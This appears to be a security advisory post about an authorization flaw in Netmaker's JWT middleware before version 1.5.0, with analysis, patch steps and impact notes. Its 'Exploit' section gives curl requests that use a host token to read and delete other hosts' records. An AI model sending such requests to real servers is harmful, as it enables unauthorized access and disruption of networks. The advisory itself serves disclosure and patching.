Listen to this Post
The vulnerability stems from a flaw in the `Authorize` middleware used by Netmaker, a tool for creating virtual overlay networks. Specifically, the mechanism for validating JSON Web Tokens (JWT) assigned to hosts is incorrect. When an API route is configured to permit host authentication (indicated by the parameter hostAllowed=true), the middleware only checks that the provided token is a valid host token. Upon validating the token, it bypasses all subsequent authorization checks that would normally verify if that specific host is permitted to interact with the requested resource. Consequently, an attacker who possesses a valid host token (which could be obtained or generated) and has knowledge of internal object identifiers (such as Node IDs or Host IDs) can exploit this. By crafting an API request with this valid host token and the target resource ID, the attacker can access, modify, or delete resources belonging to other hosts. The attack is conducted remotely and affects critical operations, including retrieving node information, deleting hosts, sending MQTT signals, and managing failover operations .
dailycve form:
Platform: Netmaker
Version: < 1.5.0
Vulnerability : Insufficient Authorization
Severity: High
date: Mar 9 2026
Prediction: Patched in 1.5.0
What Undercode Say:
Analytics:
- Vulnerability Popularity: High, as it allows unauthorized remote access to critical network infrastructure.
- Exploitability: Medium; requires knowledge of internal IDs, but host tokens may be leakable or guessable.
Exploit:
1. Identify a target Host ID (e.g., from network scans or leaked data)
TARGET_HOST_ID="insert-host-id-here"
2. Obtain or generate a valid host JWT. (Hypothetical example, as specifics depend on env)
For demonstration, assume a compromised or self-issued host token.
VALID_HOST_TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
3. Exploit the insufficient authorization to retrieve info belonging to another host.
Endpoint: /api/nodes/{node_id} (node info retrieval)
curl -X GET \
"https://netmaker-server.example.com:8081/api/nodes/${TARGET_HOST_ID}" \
-H "Authorization: Bearer ${VALID_HOST_TOKEN}" \
-H "Content-Type: application/json"
4. Attempt to delete a different host's record.
Endpoint: /api/hosts/{host_id}
curl -X DELETE \
"https://netmaker-server.example.com:8081/api/hosts/${TARGET_HOST_ID}" \
-H "Authorization: Bearer ${VALID_HOST_TOKEN}"
Protection from this CVE:
Immediate action: Update Netmaker to the patched version 1.5.0 or later. If using Go to get the module: go get -u github.com/gravitl/[email protected] If using Docker: Pull the latest patched image docker pull gravitl/netmaker:v1.5.0 Recreate the container with the new image (example) docker-compose up -d --no-deps netmaker Verification: Check the current version netmaker --version Or check the Docker container logs for the version string on startup.
Impact:
Successful exploitation leads to complete compromise of host-to-host trust within the WireGuard network. An attacker can read sensitive configuration data, disrupt network connectivity by deleting hosts, and potentially pivot to internal systems by manipulating MQTT signals or failover operations .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

